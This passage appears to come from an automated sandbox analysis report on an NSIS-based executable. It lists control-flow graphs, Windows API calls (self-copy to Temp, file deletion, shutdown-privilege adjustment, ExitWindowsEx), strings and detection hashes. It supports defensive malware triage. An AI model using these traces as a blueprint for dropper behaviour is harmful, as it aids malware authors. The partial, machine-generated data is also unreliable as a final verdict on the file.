lstrcatW SetEnvironmentVariableW * 2 call 40326f 32->50 53 4035f1-403602 call 4037c4 OleUninitialize 33->53 54 403546-40354c 33->54 51 403491-403497 34->51 52 40348f-403490 34->52 36 4033d0-4033d7 35->36 37 4033e8-403421 35->37 41 4033d9-4033dc 36->41 42 4033de 36->42 43 403423-403428 37->43 44 40343e-403478 37->44 41->37 41->42 42->37 43->44 48 40342a-403432 43->48 44->34 49 40347a-40347e 44->49 58 403434-403437 48->58 59 403439 48->59 49->34 60 40349f-4034ad call 406055 49->60 50->33 50->53 51->24 62 40349d 51->62 52->51 71 403728-40372e 53->71 72 403608-403618 call 40579a ExitProcess 53->72 55 4035e1-4035e8 call 40389e 54->55 56 403552-40355d call 405a36 54->56 70 4035ed 55->70 73 4035ab-4035b5 56->73 74 40355f-403594 56->74 58->44 58->59 59->44 63 4034b2 60->63 62->63 63->25 70->53 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 86 4035a3-4035a7 78->86 87 40359c-4035a1 78->87 79->80 81->53 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 86->78 92 4035a9 86->92 87->86 87->92 92->73 95->77 100 4037a5-4037a7 call 40140b 95->100 96->95 96->100 97->55 98->99 99->53 102 40365b-40365e 99->102 100->77 103 403660-403665 call 405683 102->103 104 403667 call 405700 102->104 113 40366c-40367a SetCurrentDirectoryW 103->113 104->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 124 40371c-403723 call 405ef6 122->124 123->122 125 4036e5-403705 call 405ef6 call 406077 call 405735 123->125 124->53 125->122 134 403707-40370e CloseHandle 125->134 134->122
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                          • GetVersion.KERNEL32 ref: 004032C8
                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                          • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                          • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\14lVOjBoI2.exe",00000000), ref: 00403363
                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\14lVOjBoI2.exe",00000020), ref: 0040338A
                                                                                                            • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                            • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                            • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                          • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                          • ExitProcess.KERNEL32 ref: 00403618
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\14lVOjBoI2.exe",00000000,?), ref: 0040362B
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\14lVOjBoI2.exe",00000000,?), ref: 0040363A
                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\14lVOjBoI2.exe",00000000,?), ref: 00403645
                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\14lVOjBoI2.exe",00000000,?), ref: 00403651
                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                          • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\14lVOjBoI2.exe,0042AA28,00000001), ref: 004036DB
                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                          • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                          • String ID: "C:\Users\user\Desktop\14lVOjBoI2.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\14lVOjBoI2.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                          • API String ID: 3586999533-3797074263
                                                                                                          • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                          • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                          • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                          • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $M$N
                                                                                                          • API String ID: 1638840714-813528018
                                                                                                          • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                          • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                          • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                          • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 507 4060c4-4060cb 503->507 505 4060d0-4060dd 504->505 506 4062cf-4062da 504->506 505->506 510 4060e3-4060ef 505->510 508 4062e5-4062e6 506->508 509 4062dc-4062e0 call 406055 506->509 507->504 509->508 512 4062b0 510->512 513 4060f5-406131 510->513 514 4062b2-4062bc 512->514 515 4062be-4062c1 512->515 516 406251-406255 513->516 517 406137-406142 GetVersion 513->517 514->504 515->504 518 406257-40625b 516->518 519 40628a-40628e 516->519 520 406144-406148 517->520 521 40615c 517->521 522 40626b-406278 call 406055 518->522 523 40625d-406269 call 405f9c 518->523 525 406290-406298 call 406077 519->525 526 40629d-4062ae lstrlenW 519->526 520->521 527 40614a-40614e 520->527 524 406163-40616a 521->524 538 40627d-406286 522->538 523->538 530 40616c-40616e 524->530 531 40616f-406171 524->531 525->526 526->504 527->521 528 406150-406154 527->528 528->521 534 406156-40615a 528->534 530->531 536 406173-406199 call 405f22 531->536 537 4061ad-4061b0 531->537 534->524 548 406238-40623c 536->548 549 40619f-4061a8 call 406077 536->549 541 4061c0-4061c3 537->541 542 4061b2-4061be GetSystemDirectoryW 537->542 538->526 540 406288 538->540 544 406249-40624f call 4062e9 540->544 546 4061c5-4061d3 GetWindowsDirectoryW 541->546 547 40622e-406230 541->547 545 406232-406236 542->545 544->526 545->544 545->548 546->547 547->545 550 4061d5-4061df 547->550 548->544 555 40623e-406244 lstrcatW 548->555 549->545 552 4061e1-4061e4 550->552 553 4061f9-40620f SHGetSpecialFolderLocation 550->553 552->553 557 4061e6-4061ed 552->557 558 406211-406228 SHGetPathFromIDListW CoTaskMemFree 553->558 559 40622a 553->559 555->544 561 4061f5-4061f7 557->561 558->545 558->559 559->547 561->545 561->553
                                                                                                          APIs
                                                                                                          • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                          • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                          • API String ID: 900638850-1230650788
                                                                                                          • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                          • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                          • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                          • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 577 4058b1-4058bc lstrcatW 569->577 578 4058be-4058bf call 405a55 569->578 570->567 574 4059b7-4059ba 570->574 571->569 571->570 575 4059c4-4059cc call 406398 574->575 576 4059bc-4059c2 574->576 575->567 586 4059ce-4059e2 call 405a09 call 4057fe 575->586 576->567 580 4058c4-4058c8 577->580 578->580 582 4058d4-4058da lstrcatW 580->582 583 4058ca-4058d2 580->583 585 4058df-4058fb lstrlenW FindFirstFileW 582->585 583->582 583->585 587 405901-405909 585->587 588 4059a5-4059a9 585->588 602 4059e4-4059e7 586->602 603 4059fa-4059fd call 4051b4 586->603 590 405929-40593d call 406055 587->590 591 40590b-405913 587->591 588->570 593 4059ab 588->593 604 405954-40595f call 4057fe 590->604 605 40593f-405947 590->605 594 405915-40591d 591->594 595 405988-405998 FindNextFileW 591->595 593->570 594->590 598 40591f-405927 594->598 595->587 601 40599e-40599f FindClose 595->601 598->590 598->595 601->588 602->576 607 4059e9-4059f8 call 4051b4 call 405ef6 602->607 603->567 613 405980-405983 call 4051b4 604->613 614 405961-405964 604->614 605->595 608 405949-405952 call 405846 605->608 607->567 608->595 613->595 617 405966-405976 call 4051b4 call 405ef6 614->617 618 405978-40597e 614->618 617->595 618->595
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 0040586F
                                                                                                          • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 004058B7
                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 004058DA
                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 004058E0
                                                                                                          • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 004058F0
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                          Strings
                                                                                                          • "C:\Users\user\Desktop\14lVOjBoI2.exe", xrefs: 0040584F
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                          • \*.*, xrefs: 004058B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                          • String ID: "C:\Users\user\Desktop\14lVOjBoI2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                          • API String ID: 2035342205-3659096904
                                                                                                          • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                          • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                          • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                          • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed, xrefs: 00402154
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInstance
                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed
                                                                                                          • API String ID: 542301482-1073148364
                                                                                                          • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                          • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                          • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                          • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                          APIs
